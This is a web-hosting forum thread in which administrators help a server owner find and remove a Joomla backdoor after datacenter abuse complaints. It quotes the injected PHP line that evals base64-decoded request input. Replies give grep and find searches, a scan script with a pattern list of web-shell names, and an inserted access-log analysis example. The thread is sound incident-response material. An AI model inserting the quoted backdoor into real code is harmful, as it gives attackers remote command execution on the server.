#1
03-09-2013, 03:44 AM
afradata
Newbie
Join Date: Feb 2013
Posts: 11

Find a php code on all php files

Hi to all,

I've received a few complaints from the xlhost datacenter:

Subject: TOS Violation - Malicious Activity


Abuse Team,
It appears that the below IP addresses that you seem to host have been used in recent cyber attacks. We have been informed these compromises are possibly the result of a Joomla or other CMS vulnerability and if not patched will simply be re-infected.
We request that you investigate these IP addresses to identify any malicious activity. If you are able to confirm suspicious activity, we ask that you take appropriate action to disable the malware, patch the vulnerability or remove the devices from the network. It is also likely Joomla administrative passwords were compromised and they should be changed to prevent re-infection.
All IPs/URLs have been confirmed as active just prior to this notification being sent. If you feel action has already been taken, please reconfirm by viewing the HTTP status with a tool like wget or cURL. If using cURL, use the following command:
curl -A "Mozilla/4.0" -iL
Please note the HTTP status in the first line of output: if the first line of output is 'HTTP/1.1 200 OK', that means the file exists, despite any other output in subsequent lines.
Thank you for your immediate attention and action. Please contact us as soon as you receive this and stay in contact until any issues have been resolved. Additional technical details are provided below.
Regards,
Abuse Team
Bank of America

Examples of Malicious Content
Malicious content:
xxx.xxx.xxx.xxx /plugins/system/dvmessages.php,

This site is Joomla 1.5.

I've checked the dvmessages.php file.

The hacked file was attached as file.php.

I examined a normal dvmessages.php file.

The normal file was attached as file.php.

The difference between the two files is the hacked code below:
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));

I want to search for this code, defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); in all users' php files under the /home folder.

Please help me.

Thanks all
Attached Files: dvmessages.zip (2.2 KB, 49 views)



#2
03-09-2013, 05:05 AM
@ntvlinux
Newbie
Join Date: Jun 2011
Location: India
Posts: 15
Hello Friend,

To find specific content in different files in a directory, you can use the command below. This command will give a list of files that contain "JEXEC" along with the paths to the files.

grep -irl JEXEC /home

You can replace JEXEC with the content you want to search for.

You can also search for "defined( '_JEXEC' )", i.e. within "" if it contains spaces.

Please try.

#3
03-09-2013, 08:37 AM
pasargad
Newbie
Join Date: Jul 2009
Posts: 12
Hello
I want to know how XLHost found it. Please contact them and ask.
Maybe they have a finder for these files.
Thank you

#4
03-09-2013, 09:42 AM
madaboutlinux
Web Hosting Master
Join Date: Jul 2009
Posts: 1,543
To search all the files of all accounts on the server, use the command below:

Quote:
for i in `cat /etc/trueuserdomains | awk '{print $2}'`; do grep -lR 'eval(base64_decode($_REQUEST' /home/$i/public_html/*; done;

__________________
| LinuxHostingSupport.net
| Server Setup | Security | Optimization | Troubleshooting | Server Migration
| Monthly and Task basis services.
| MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux

#5
03-21-2013, 02:02 PM
afradata
Newbie
Join Date: Feb 2013
Posts: 11
Quote:
Originally Posted by madaboutlinux
To search all the files of all accounts on the server, use the command below:
Thank you madaboutlinux.
This code works on cPanel.
I want to search on a DirectAdmin panel.

Best regards

#6
03-21-2013, 02:18 PM
kevincheri
Web Hosting Master
Join Date: May 2012
Location: India
Posts: 673
Try this:
find /home/ -type f -name \*.php -exec grep -il 'eval(base64_decode($_REQUEST' {} \;

__________________
Kevin Cheri : Freelance Linux Admin 6+ Exp, reach me out for any help
Skype : lynxmaestro
Gmail : cheri.kevin@gmail.com

#7
03-21-2013, 05:05 PM
gnulinuxexpert
WHT Addict
Join Date: Aug 2010
Location: /bin/bash
Posts: 123
You can use the following code as well. Save it as scan.sh and then give the script execute permission. Just add the search pattern that you require in the line "pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

Quote:
#!/bin/bash
# Regex of strings commonly found in web shells and IRC bots; add any pattern
# you find in an infected file, separated by |
pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
searchpath=/home/*
# List PHP, CGI, include and Perl files under searchpath that match the pattern
# (case-insensitive); -print0/xargs -0 keep file names with spaces intact and
# /dev/null makes egrep always print the file name
find $searchpath \( -regex '.*\.php$' -o -regex '.*\.cgi$' -o -regex '.*\.inc$' -o -regex '.*\.pl$' \) -print0 | xargs -0 egrep -il "$pattern" /dev/null | sort >> report.$$
cat report.$$
Cheers!!!

__________________
When all else fails ... Read the documentation!!!



#8
03-22-2013, 02:30 AM
pasargad
Newbie
Join Date: Jul 2009
Posts: 12
Quote:
Originally Posted by gnulinuxexpert
You can use the following code as well. Save it as scan.sh and then give the script execute permission. Just add the search pattern that you require in the line "pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

Quote:
#!/bin/bash
# Regex of strings commonly found in web shells and IRC bots; add any pattern
# you find in an infected file, separated by |
pattern='r57shell|c99shell|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|\.ru/|brute *force|multiviews|cwings|bitchx|eggdrop|guardservices|psybnc|dalnet|undernet|vulnscan|spymeta|raslan58|deface|defacing|defacer|MSRml'
searchpath=/home/*
# List PHP, CGI, include and Perl files under searchpath that match the pattern
# (case-insensitive); -print0/xargs -0 keep file names with spaces intact and
# /dev/null makes egrep always print the file name
find $searchpath \( -regex '.*\.php$' -o -regex '.*\.cgi$' -o -regex '.*\.inc$' -o -regex '.*\.pl$' \) -print0 | xargs -0 egrep -il "$pattern" /dev/null | sort >> report.$$
cat report.$$
Cheers!!!
Hello

Where can I use this?
Copy it into a .sh file and run it?
I received mail from my data center about this problem.

Quote:
Dear Sir or Madam,

We have received spam/abuse notification. Please take the necessary
steps to prevent this from happening again in future.

Furthermore, we would request that you provide both ourselves and the
person who has submitted this complaint with a short statement within
24 hours. This statement should include details of the events leading
up to the incident and the steps you are taking to deal with it.

Next steps:
- Solve the problem
- Send your statement to us: Please use the following link for this: http://abuse.hetzner.de/ [link to reply to abuse]
- Send your statement to the person making the complaint per email

The details will then be checked by a colleague, who will coordinate
further proceedings. In the event of several complaints, this may
lead to the server being locked.

Important information:
When replying to us, please leave the Abuse ID [AbuseID:000000] in
the subject line unchanged.


Kind regards,

Sandra Betz

Hetzner Online AG
Stuttgarter Straße 1
91710 Gunzenhausen
Tel: + 49 (0)9831 610061
Fax: + 49 (0)9831 61006-2
abuse@hetzner.de
www.hetzner.com

Register Court: Registergericht Ansbach, HRB 3204
Management Board: Dipl. Ing. (FH) Martin Hetzner
Chairwoman of the Supervisory Board: Diana Rothhan

----- attachment -----

Dear Hetzner Abuse Team,

We have been informed of web servers in Germany which were apparently
compromised and are participating in DDoS attacks. Below is the list of
servers that are in your network area. The URL points to scripts that
have apparently been uploaded onto the servers by the attacker.

----- log file -----

IP: my server ip

Script(s):

http://domain1.com/plugins/system/dvmessages.php
http://domain2.com/plugins/system/dvmessages.php
Thank you

#9
03-22-2013, 02:29 PM
gnulinuxexpert
WHT Addict
Join Date: Aug 2010
Location: /bin/bash
Posts: 123
Hi,

First of all you should disable the following files, or your DC will suspend your server.

http://domain1.com/plugins/system/dvmessages.php
http://domain2.com/plugins/system/dvmessages.php

This dvmessages.php seems to be infected, and it's part of a Joomla plugin. Check the access log for the IPs that accessed the php file and block them. It would be better to suspend the account and reactivate it only after updating Joomla and the plugin. Update the DC that you have disabled the files, blocked the IPs and disabled the website, and will enable it only after updating the outdated plugins.

You may check for similar files like dvmessages.php using the following commands.

Quote:
updatedb
locate dvmessages.php
Check the output and review the files to see if any are infected.

If you are not sure about this, I would recommend you hire an administrator who knows about this.

To execute the script, just create a file named scan.sh and copy and paste the script contents into it.

Save it.

Provide execute permission using the following.

Quote:
chmod +x scan.sh
Run it using

Quote:
./scan.sh
Make sure to add the particular pattern you found in dvmessages.php so the script will scan for that pattern as well.

Cheers!!!

__________________
When all else fails ... Read the documentation!!!
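The "check the access log for the IPs that accessed the php file" step above, written out as an added example (this is not code from gnulinuxexpert or anyone else in the thread). It reads an Apache or nginx access log in the combined format from standard input and, for one script path, prints every client IP together with its request count and the first and last time it was seen, which is also the kind of timeline the datacenter's "statement of events" asks for. The log lines embedded in the script are constructed for the example and are not real traffic; the script path is the one named in the thread.

```shell
#!/bin/sh
# Added example, not from this thread: summarise which client IPs requested a
# given script, from an Apache/nginx access log in the combined format.
# Assumption: one request per line, client IP in field 1, "[timestamp" in field 4.
# The sample below is constructed for the example and is not real traffic.

SAMPLE_LOG='203.0.113.7 - - [21/Mar/2013:14:02:11 +0000] "GET /plugins/system/dvmessages.php HTTP/1.1" 200 18 "-" "Mozilla/4.0"
198.51.100.22 - - [21/Mar/2013:14:03:40 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Mar/2013:14:05:02 +0000] "POST /plugins/system/dvmessages.php HTTP/1.1" 200 25 "-" "Mozilla/4.0"
192.0.2.9 - - [21/Mar/2013:14:09:15 +0000] "POST /plugins/system/dvmessages.php HTTP/1.1" 200 25 "-" "curl/7.29"'

# hits_by_ip SCRIPTPATH < access_log
# Prints "count ip first_seen last_seen", busiest IP first. The path is matched
# as a fixed string (grep -F) so the dot in ".php" is literal.
hits_by_ip() {
    grep -F -- "$1" | awk '
        {
            ip = $1; ts = substr($4, 2)     # $4 is "[21/Mar/2013:14:02:11"; drop the "["
            n[ip]++
            if (!(ip in first)) first[ip] = ts
            last[ip] = ts
        }
        END { for (ip in n) printf "%d %s %s %s\n", n[ip], ip, first[ip], last[ip] }' \
    | sort -rn
}

# Stand-alone use: ./hits.sh /plugins/system/dvmessages.php < /var/log/apache2/access_log
# With no arguments the constructed sample above is analysed instead.
if [ $# -ge 1 ]; then
    hits_by_ip "$1"
else
    printf '%s\n' "$SAMPLE_LOG" | hits_by_ip /plugins/system/dvmessages.php
fi
```

On the sample this prints 203.0.113.7 first (two requests, 14:02:11 to 14:05:02) and 192.0.2.9 second; 198.51.100.22 only fetched index.php and does not appear. Review the list before blocking anything, since a legitimate visitor can also hit a plugin URL once.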



#10
03-23-2013, 10:20 AM
mixmox
I Like Beer!
Join Date: Sep 2008
Location: Sweden
Posts: 1,163
Quote:
Originally Posted by gnulinuxexpert
You can use the following code as well. Save it as scan.sh and then give the script execute permission. Just add the search pattern that you require in the line "pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

Cheers!!!
c99 files are encoded with base64 or ionCube.
None of the new c99 shell files are released with the main code in the open.

#11
03-26-2013, 01:39 AM
afradata
Newbie
Join Date: Feb 2013
Posts: 11
Quote:
Originally Posted by gnulinuxexpert
You can use the following code as well. Save it as scan.sh and then give the script execute permission. Just add the search pattern that you require in the line "pattern". You can see some common patterns already defined in the script. You will get the output as report.something.

Cheers!!!
Hi

How can I create a .sh to search with the code

for i in `cat /etc/trueuserdomains | awk '{print $2}'`; do grep -lR 'eval(base64_decode($_REQUEST' /home/$i/public_html/*; done;

and save all the results and move the found files to another directory, sample path /home/Quarantine?

When the .sh runs, it should search, find the files, move them to another folder and report the scan results.

Thank you
